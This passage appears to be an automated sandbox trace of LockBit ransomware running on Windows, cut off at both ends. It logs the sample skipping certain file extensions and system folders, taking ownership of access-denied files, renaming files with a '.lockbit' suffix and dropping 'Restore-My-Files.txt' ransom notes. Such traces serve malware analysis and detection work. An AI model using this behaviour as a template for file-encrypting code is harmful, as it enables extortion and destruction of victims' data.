lstrcmpiW (lpString1=".mp3", lpString2=".mui") returned -1 [0077.041] lstrcmpiW (lpString1=".reg", lpString2=".mui") returned 1 [0077.041] lstrcmpiW (lpString1=".dll", lpString2=".mui") returned -1 [0077.041] lstrcmpiW (lpString1=".ini", lpString2=".mui") returned -1 [0077.041] lstrcmpiW (lpString1=".idx", lpString2=".mui") returned -1 [0077.042] lstrcmpiW (lpString1=".sys", lpString2=".mui") returned 1 [0077.042] lstrcmpiW (lpString1=".hlp", lpString2=".mui") returned -1 [0077.042] lstrcmpiW (lpString1=".ico", lpString2=".mui") returned -1 [0077.042] lstrcmpiW (lpString1=".lnk", lpString2=".mui") returned -1 [0077.042] lstrcmpiW (lpString1=".rdp", lpString2=".mui") returned 1 [0077.042] wsprintfW (in: param_1=0x344ce80, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0077.042] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="tipresx.dll.mui") returned -1 [0077.042] lstrcmpiW (lpString1="ntldr", lpString2="tipresx.dll.mui") returned -1 [0077.042] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="tipresx.dll.mui") returned -1 [0077.042] lstrcmpiW (lpString1="bootsect.bak", lpString2="tipresx.dll.mui") returned -1 [0077.042] lstrcmpiW (lpString1="autorun.inf", lpString2="tipresx.dll.mui") returned -1 [0077.042] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\") returned="" [0077.042] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui") returned=".mui" [0077.042] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0077.042] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0077.042] lstrcmpiW (lpString1=".7z", lpString2=".mui") returned -1 [0077.042] lstrcmpiW (lpString1=".ckp", lpString2=".mui") returned -1 [0077.042] lstrcmpiW (lpString1=".dacpac", lpString2=".mui") returned -1 [0077.042] lstrcmpiW (lpString1=".db", lpString2=".mui") returned -1 [0077.042] lstrcmpiW (lpString1=".db-shm", lpString2=".mui") returned -1 [0077.042] lstrcmpiW (lpString1=".db-wal", lpString2=".mui") returned -1 [0077.042] lstrcmpiW (lpString1=".db3", lpString2=".mui") returned -1 [0077.042] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0077.042] lstrcmpiW (lpString1=".dbc", lpString2=".mui") returned -1 [0077.042] lstrcmpiW (lpString1=".dbs", lpString2=".mui") returned -1 [0077.042] lstrcmpiW (lpString1=".dbt", lpString2=".mui") returned -1 [0077.043] lstrcmpiW (lpString1=".dbv", lpString2=".mui") returned -1 [0077.043] lstrcmpiW (lpString1=".frm", lpString2=".mui") returned -1 [0077.043] lstrcmpiW (lpString1=".mdf", lpString2=".mui") returned -1 [0077.043] lstrcmpiW (lpString1=".mrg", lpString2=".mui") returned -1 [0077.043] lstrcmpiW (lpString1=".mwb", lpString2=".mui") returned 1 [0077.043] lstrcmpiW (lpString1=".myd", lpString2=".mui") returned 1 [0077.043] lstrcmpiW (lpString1=".ndf", lpString2=".mui") returned 1 [0077.043] lstrcmpiW (lpString1=".qry", lpString2=".mui") returned 1 [0077.043] lstrcmpiW (lpString1=".sdb", lpString2=".mui") returned 1 [0077.043] lstrcmpiW (lpString1=".sdf", lpString2=".mui") returned 1 [0077.043] lstrcmpiW (lpString1=".sql", lpString2=".mui") returned 1 [0077.043] lstrcmpiW (lpString1=".sqlite", lpString2=".mui") returned 1 [0077.043] lstrcmpiW (lpString1=".sqlite3", lpString2=".mui") returned 1 [0077.043] lstrcmpiW (lpString1=".sqlitedb", lpString2=".mui") returned 1 [0077.043] lstrcmpiW (lpString1=".tmd", lpString2=".mui") returned 1 [0077.043] wsprintfW (in: param_1=0x344c620, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui.lockbit") returned 81 [0077.043] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0077.043] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui.lockbit")) returned 0 [0077.043] GetLastError () returned 0x5 [0077.044] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0077.044] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0077.044] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0077.044] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0077.045] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0077.045] NtOpenFile (in: FileHandle=0x344c5c8, DesiredAccess=0x80, ObjectAttributes=0x344c478*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344c470, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344c5c8*=0x3b4, IoStatusBlock=0x344c470*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0077.045] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0077.045] NtQueryInformationFile (in: FileHandle=0x3b4, IoStatusBlock=0x344c490, FileInformation=0x344c350, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344c490, FileInformation=0x344c350) returned 0x0 [0077.189] NtClose (Handle=0x3b4) returned 0x0 [0077.189] RtlFreeAnsiString (AnsiString="\\") [0077.189] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344c604 | out: TokenHandle=0x344c604*=0x3b4) returned 1 [0077.189] malloc (_Size=0x200) returned 0x53fcc0 [0077.189] GetTokenInformation (in: TokenHandle=0x3b4, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344c600 | out: TokenInformation=0x53fcc0, ReturnLength=0x344c600) returned 1 [0077.189] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344c5e8, dwRevision=0x1 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0077.189] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344c5e8, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344c5e8) returned 1 [0077.189] CloseHandle (hObject=0x3b4) returned 1 [0077.190] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui", SecurityInformation=0x1, pSecurityDescriptor=0x344c5e8) returned 1 [0077.190] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui", SecurityInformation=0x4, pSecurityDescriptor=0x344c5e8) returned 1 [0077.191] free (_Block=0x53fcc0) [0077.191] lstrcmpiW (lpString1=".mui", lpString2=".lockbit") returned 1 [0077.191] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui.lockbit")) returned 1 [0077.196] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\tipresx.dll.mui.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b4 [0077.196] CreateIoCompletionPort (FileHandle=0x3b4, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0077.196] malloc (_Size=0x40068) returned 0x206b860 [0077.196] GetFileSizeEx (in: hFile=0x3b4, lpFileSize=0x206b878 | out: lpFileSize=0x206b878*=4096) returned 1 [0077.196] ReadFile (in: hFile=0x3b4, lpBuffer=0x206b894, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860 | out: lpBuffer=0x206b894, lpNumberOfBytesRead=0x0, lpOverlapped=0x206b860) returned 0x0 [0077.198] GetLastError () returned 0x3e5 [0077.198] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\tipresx.dll.mui" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG") returned 1 [0077.198] wsprintfW (in: param_1=0x344c3d8, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\Restore-My-Files.txt") returned 78 [0077.198] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\bg-BG\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\bg-bg\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b8 [0077.199] CreateIoCompletionPort (FileHandle=0x3b8, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0077.199] malloc (_Size=0x40068) returned 0x20abae0 [0077.200] WriteFile (in: hFile=0x3b8, lpBuffer=0x2064f58, nNumberOfBytesToWrite=0x3a1, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x2064f58, lpNumberOfBytesWritten=0x0, lpOverlapped=0x20abae0) returned 0x0 [0077.201] GetLastError () returned 0x3e5 [0077.201] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: lpFindFileData=0x344cf48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xea1207ac, ftCreationTime.dwHighDateTime=0x1ca0420, ftLastAccessTime.dwLowDateTime=0xea335ac2, ftLastAccessTime.dwHighDateTime=0x1ca0420, ftLastWriteTime.dwLowDateTime=0xea35bc1f, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x1000, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="tipresx.dll.mui", cAlternateFileName="")) returned 0 [0077.202] GetLastError () returned 0x12 [0077.202] FindClose (in: hFindFile=0x2e3290 | out: hFindFile=0x2e3290) returned 1 [0077.202] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x90daefa5, ftCreationTime.dwHighDateTime=0x1c9ea0f, ftLastAccessTime.dwLowDateTime=0x90daefa5, ftLastAccessTime.dwHighDateTime=0x1c9ea0f, ftLastWriteTime.dwLowDateTime=0x90daefa5, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x69a5, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="Content.xml", cAlternateFileName="")) returned 1 [0077.202] lstrcmpiW (lpString1=".", lpString2="Content.xml") returned -1 [0077.202] lstrcmpiW (lpString1="..", lpString2="Content.xml") returned -1 [0077.202] PathFindExtensionW (pszPath="Content.xml") returned=".xml" [0077.202] lstrcmpiW (lpString1=".386", lpString2=".xml") returned -1 [0077.202] lstrcmpiW (lpString1=".cmd", lpString2=".xml") returned -1 [0077.202] lstrcmpiW (lpString1=".exe", lpString2=".xml") returned -1 [0077.202] lstrcmpiW (lpString1=".ani", lpString2=".xml") returned -1 [0077.202] lstrcmpiW (lpString1=".adv", lpString2=".xml") returned -1 [0077.202] lstrcmpiW (lpString1=".theme", lpString2=".xml") returned -1 [0077.202] lstrcmpiW (lpString1=".msi", lpString2=".xml") returned -1 [0077.202] lstrcmpiW (lpString1=".msp", lpString2=".xml") returned -1 [0077.202] lstrcmpiW (lpString1=".com", lpString2=".xml") returned -1 [0077.202] lstrcmpiW (lpString1=".diagpkg", lpString2=".xml") returned -1 [0077.202] lstrcmpiW (lpString1=".nls", lpString2=".xml") returned -1 [0077.202] lstrcmpiW (lpString1=".diagcab", lpString2=".xml") returned -1 [0077.202] lstrcmpiW (lpString1=".lock", lpString2=".xml") returned -1 [0077.202] lstrcmpiW (lpString1=".ocx", lpString2=".xml") returned -1 [0077.203] lstrcmpiW (lpString1=".mpa", lpString2=".xml") returned -1 [0077.203] lstrcmpiW (lpString1=".cpl", lpString2=".xml") returned -1 [0077.203] lstrcmpiW (lpString1=".mod", lpString2=".xml") returned -1 [0077.203] lstrcmpiW (lpString1=".hta", lpString2=".xml") returned -1 [0077.203] lstrcmpiW (lpString1=".icns", lpString2=".xml") returned -1 [0077.203] lstrcmpiW (lpString1=".prf", lpString2=".xml") returned -1 [0077.203] lstrcmpiW (lpString1=".rtp", lpString2=".xml") returned -1 [0077.203] lstrcmpiW (lpString1=".diagcfg", lpString2=".xml") returned -1 [0077.203] lstrcmpiW (lpString1=".msstyles", lpString2=".xml") returned -1 [0077.203] lstrcmpiW (lpString1=".bin", lpString2=".xml") returned -1 [0077.203] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0077.203] lstrcmpiW (lpString1=".shs", lpString2=".xml") returned -1 [0077.203] lstrcmpiW (lpString1=".drv", lpString2=".xml") returned -1 [0077.203] lstrcmpiW (lpString1=".wpx", lpString2=".xml") returned -1 [0077.203] lstrcmpiW (lpString1=".bat", lpString2=".xml") returned -1 [0077.203] lstrcmpiW (lpString1=".rom", lpString2=".xml") returned -1 [0077.203] lstrcmpiW (lpString1=".msc", lpString2=".xml") returned -1 [0077.218] lstrcmpiW (lpString1=".spl", lpString2=".xml") returned -1 [0077.218] lstrcmpiW (lpString1=".ps1", lpString2=".xml") returned -1 [0077.218] lstrcmpiW (lpString1=".msu", lpString2=".xml") returned -1 [0077.218] lstrcmpiW (lpString1=".ics", lpString2=".xml") returned -1 [0077.218] lstrcmpiW (lpString1=".key", lpString2=".xml") returned -1 [0077.218] lstrcmpiW (lpString1=".mp3", lpString2=".xml") returned -1 [0077.218] lstrcmpiW (lpString1=".reg", lpString2=".xml") returned -1 [0077.218] lstrcmpiW (lpString1=".dll", lpString2=".xml") returned -1 [0077.218] lstrcmpiW (lpString1=".ini", lpString2=".xml") returned -1 [0077.218] lstrcmpiW (lpString1=".idx", lpString2=".xml") returned -1 [0077.218] lstrcmpiW (lpString1=".sys", lpString2=".xml") returned -1 [0077.218] lstrcmpiW (lpString1=".hlp", lpString2=".xml") returned -1 [0077.219] lstrcmpiW (lpString1=".ico", lpString2=".xml") returned -1 [0077.219] lstrcmpiW (lpString1=".lnk", lpString2=".xml") returned -1 [0077.219] lstrcmpiW (lpString1=".rdp", lpString2=".xml") returned -1 [0077.219] wsprintfW (in: param_1=0x344d620, param_2="%S" | out: param_1="Restore-My-Files.txt") returned 20 [0077.219] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Content.xml") returned 1 [0077.219] lstrcmpiW (lpString1="ntldr", lpString2="Content.xml") returned 1 [0077.219] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Content.xml") returned 1 [0077.219] lstrcmpiW (lpString1="bootsect.bak", lpString2="Content.xml") returned -1 [0077.219] lstrcmpiW (lpString1="autorun.inf", lpString2="Content.xml") returned -1 [0077.219] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\") returned="" [0077.219] PathFindExtensionW (pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml") returned=".xml" [0077.219] lstrcmpiW (lpString1=".rar", lpString2=".xml") returned -1 [0077.219] lstrcmpiW (lpString1=".zip", lpString2=".xml") returned 1 [0077.219] lstrcmpiW (lpString1=".7z", lpString2=".xml") returned -1 [0077.219] lstrcmpiW (lpString1=".ckp", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".dacpac", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".db", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".db-shm", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".db-wal", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".db3", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".dbf", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".dbc", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".dbs", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".dbt", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".dbv", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".frm", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".mdf", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".mrg", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".mwb", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".myd", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".ndf", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".qry", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".sdb", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".sdf", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".sql", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".sqlite", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".sqlite3", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".sqlitedb", lpString2=".xml") returned -1 [0077.220] lstrcmpiW (lpString1=".tmd", lpString2=".xml") returned -1 [0077.220] wsprintfW (in: param_1=0x344cdc0, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.lockbit") returned 71 [0077.220] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0077.220] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.lockbit")) returned 0 [0077.221] GetLastError () returned 0x5 [0077.221] GetProcAddress (hModule=0x77150000, lpProcName="RtlFreeUnicodeString") returned 0x7717e126 [0077.221] GetProcAddress (hModule=0x77150000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77191660 [0077.221] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0077.222] GetProcAddress (hModule=0x77150000, lpProcName="NtOpenFile") returned 0x7716fd54 [0077.222] GetProcAddress (hModule=0x77150000, lpProcName="NtClose") returned 0x7716f9d0 [0077.222] NtOpenFile (in: FileHandle=0x344cd68, DesiredAccess=0x80, ObjectAttributes=0x344cc18*(Length=0x18, RootDirectory=0x0, ObjectName="\\??\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), Attributes=0x0, SecurityDescriptor=0x0, SecurityQualityOfService=0x0), IoStatusBlock=0x344cc10, ShareAccess=0x7, OpenOptions=0x0 | out: FileHandle=0x344cd68*=0x3b0, IoStatusBlock=0x344cc10*(Status=0x0, Pointer=0x0, Information=0x1)) returned 0x0 [0077.223] GetProcAddress (hModule=0x77150000, lpProcName="NtQueryInformationFile") returned 0x7716fa00 [0077.223] NtQueryInformationFile (in: FileHandle=0x3b0, IoStatusBlock=0x344cc30, FileInformation=0x344caf0, Length=0x110, FileInformationClass=0x2f | out: IoStatusBlock=0x344cc30, FileInformation=0x344caf0) returned 0x0 [0077.251] NtClose (Handle=0x3b0) returned 0x0 [0077.251] RtlFreeAnsiString (AnsiString="\\") [0077.251] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x344cda4 | out: TokenHandle=0x344cda4*=0x3b0) returned 1 [0077.251] malloc (_Size=0x200) returned 0x53fcc0 [0077.251] GetTokenInformation (in: TokenHandle=0x3b0, TokenInformationClass=0x1, TokenInformation=0x53fcc0, TokenInformationLength=0x200, ReturnLength=0x344cda0 | out: TokenInformation=0x53fcc0, ReturnLength=0x344cda0) returned 1 [0077.251] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x344cd88, dwRevision=0x1 | out: pSecurityDescriptor=0x344cd88) returned 1 [0077.251] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x344cd88, pOwner=0x53fcc8*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x344cd88) returned 1 [0077.251] CloseHandle (hObject=0x3b0) returned 1 [0077.251] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", SecurityInformation=0x1, pSecurityDescriptor=0x344cd88) returned 1 [0077.252] SetFileSecurityW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml", SecurityInformation=0x4, pSecurityDescriptor=0x344cd88) returned 1 [0077.252] free (_Block=0x53fcc0) [0077.252] lstrcmpiW (lpString1=".xml", lpString2=".lockbit") returned 1 [0077.252] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml"), lpNewFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.lockbit")) returned 1 [0077.253] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml.lockbit" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\content.xml.lockbit"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3b0 [0077.253] CreateIoCompletionPort (FileHandle=0x3b0, ExistingCompletionPort=0x1e4, CompletionKey=0x0, NumberOfConcurrentThreads=0x8) returned 0x1e4 [0077.253] malloc (_Size=0x40068) returned 0x20abae0 [0077.253] GetFileSizeEx (in: hFile=0x3b0, lpFileSize=0x20abaf8 | out: lpFileSize=0x20abaf8*=27045) returned 1 [0077.254] ReadFile (in: hFile=0x3b0, lpBuffer=0x20abb14, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0 | out: lpBuffer=0x20abb14*, lpNumberOfBytesRead=0x0, lpOverlapped=0x20abae0) returned 1 [0077.256] GetLastError () returned 0x3e5 [0077.256] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Content.xml" | out: pszPath="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink") returned 1 [0077.256] wsprintfW (in: param_1=0x344cb78, param_2="%s%S" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt") returned 72 [0077.256] CreateFileW (lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\Restore-My-Files.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0077.256] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6c92176b, ftCreationTime.dwHighDateTime=0x1ca0416, ftLastAccessTime.dwLowDateTime=0x6c92176b, ftLastAccessTime.dwHighDateTime=0x1ca0416, ftLastWriteTime.dwLowDateTime=0xdd6ec0f0, ftLastWriteTime.dwHighDateTime=0x1ca0423, nFileSizeHigh=0x0, nFileSizeLow=0x2f200, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="ConvertInkStore.exe", cAlternateFileName="")) returned 1 [0077.256] lstrcmpiW (lpString1=".", lpString2="ConvertInkStore.exe") returned -1 [0077.256] lstrcmpiW (lpString1="..", lpString2="ConvertInkStore.exe") returned -1 [0077.256] PathFindExtensionW (pszPath="ConvertInkStore.exe") returned=".exe" [0077.256] lstrcmpiW (lpString1=".386", lpString2=".exe") returned -1 [0077.256] lstrcmpiW (lpString1=".cmd", lpString2=".exe") returned -1 [0077.256] lstrcmpiW (lpString1=".exe", lpString2=".exe") returned 0 [0077.256] FindNextFileW (in: hFindFile=0x2e3250, lpFindFileData=0x344d6e8 | out: lpFindFileData=0x344d6e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7545b2, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd77a70c, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd77a70c, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xfd7545b2, dwReserved1=0x1ca0431, cFileName="cs-CZ", cAlternateFileName="")) returned 1 [0077.256] lstrcmpiW (lpString1=".", lpString2="cs-CZ") returned -1 [0077.257] lstrcmpiW (lpString1="..", lpString2="cs-CZ") returned -1 [0077.257] lstrcmpiW (lpString1="cs-CZ", lpString2="$windows.~bt") returned 1 [0077.257] lstrcmpiW (lpString1="cs-CZ", lpString2="intel") returned -1 [0077.257] lstrcmpiW (lpString1="cs-CZ", lpString2="msocache") returned -1 [0077.257] lstrcmpiW (lpString1="cs-CZ", lpString2="$recycle.bin") returned 1 [0077.257] lstrcmpiW (lpString1="cs-CZ", lpString2="$windows.~ws") returned 1 [0077.257] lstrcmpiW (lpString1="cs-CZ", lpString2="tor browser") returned -1 [0077.257] lstrcmpiW (lpString1="cs-CZ", lpString2="boot") returned 1 [0077.257] lstrcmpiW (lpString1="cs-CZ", lpString2="system volume information") returned -1 [0077.257] lstrcmpiW (lpString1="cs-CZ", lpString2="perflogs") returned -1 [0077.257] lstrcmpiW (lpString1="cs-CZ", lpString2="google") returned -1 [0077.257] lstrcmpiW (lpString1="cs-CZ", lpString2="application data") returned 1 [0077.257] lstrcmpiW (lpString1="cs-CZ", lpString2="windows") returned -1 [0077.257] lstrcmpiW (lpString1="cs-CZ", lpString2="windows.old") returned -1 [0077.257] lstrcmpiW (lpString1="cs-CZ", lpString2="appdata") returned 1 [0077.257] lstrcmpiW (lpString1="cs-CZ", lpString2="Windows nt") returned -1 [0077.257] lstrcmpiW (lpString1="cs-CZ", lpString2="Msbuild") returned -1 [0077.257] lstrcmpiW (lpString1="cs-CZ", lpString2="Microsoft") returned -1 [0077.257] lstrcmpiW (lpString1="cs-CZ", lpString2="All users") returned 1 [0077.257] lstrcmpiW (lpString1="cs-CZ", lpString2="mozilla") returned -1 [0077.257] wsprintfW (in: param_1=0x344d200, param_2="%s\\%s" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ") returned 57 [0077.257] wsprintfW (in: param_1=0x344ca60, param_2="%s\\*" | out: param_1="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*") returned 59 [0077.258] FindFirstFileExW (in: lpFileName="C:\\\\Program Files\\Common Files\\Microsoft Shared\\ink\\cs-CZ\\*" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\cs-cz\\*"), fInfoLevelId=0x0, lpFindFileData=0x344cf48, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x344cf48) returned 0x2e3290 [0077.258] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0077.258] FindNextFileW (in: hFindFile=0x2e3290, lpFindFileData=0x344cf48 | out: 